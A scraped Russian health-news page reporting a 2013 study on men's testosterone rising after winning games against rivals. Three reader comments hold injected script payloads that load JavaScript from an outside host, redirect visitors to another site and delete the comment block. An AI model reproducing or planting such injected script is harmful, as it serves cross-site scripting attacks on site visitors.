Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Мужской гормон страсти по...  >>  Мужской гормон страсти повышается, когда он выигрывает в игру!
 
Обратная связь
 

Мужской гормон страсти повышается, когда он выигрывает в игру!

Размер шрифта
18 июня 2013 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Американские ученые обнаружили, что уровень тестостерона у мужчин во время командных соревнований зависит от отношений между участниками соревнований.

Профессор антропологии Марк Флинн и его коллеги из Миссурийского университета (США) провели исследование с участием мужчин, проживающих на острове Доминика, которые играли в домино или крикет. Если мужчины играли со своими соперниками, то когда они выигрывали, уровень тестостерона повышался во время и после соревнований, а когда проигрывали, – снижался. Однако если мужчины играли со своими друзьями, то уровень тестостерона не менялся ни при победе, ни при поражении.

Командные соревнования повышают уровень тестостерона у мужчин, причем для этого не обязательно участвовать в соревнованиях. Переживая за любимую команду вместе с другими болельщиками, мужчина становится частью команды болельщиков, и уровень тестостерона также повышается. «Например, когда команда Миссурийского университета играет против команды Канзасского университета и побеждает в игре, у мужчин повышается уровень тестостерона. В то же время, если собрать болельщиков вместе, то у них наблюдаются такие же реакции», – поясняет Марк Флинн.

Такое свойство присуще только человеку. Вне зависимости от того, наблюдает ли он за игрой с трибуны или участвует в соревнованиях, он мысленно взаимодействует со всеми членами команды.

Так что, женщины, если вам не хватает страсти в отношениях – позвольте мужчине поиграть! После своей победы он набросится на вас со страстью!

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:13

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 19:32

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 23:13

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Гормон секса не даст вам наесться!   5 цифр про вашего мужа и сына, которые вы должны знать   Что женщина может узнать по руке мужчины   В лабораториях научились выращивать настоящие половые члены?  
17 июня 2013Мужской гормон страсти повышается, когда он выигрывает в игру! 01 ноября 2013ИНВИТРО – «Марка №1» в России
 
21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт» 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 

Слайдшоу

1
Вся правда о тестостероне
Ваш муж теряет мужественность? Признаки низкого тестостерона
Почему у вас нет секса? Вся правда о тестостероне!

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Яички – удивительный орган
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.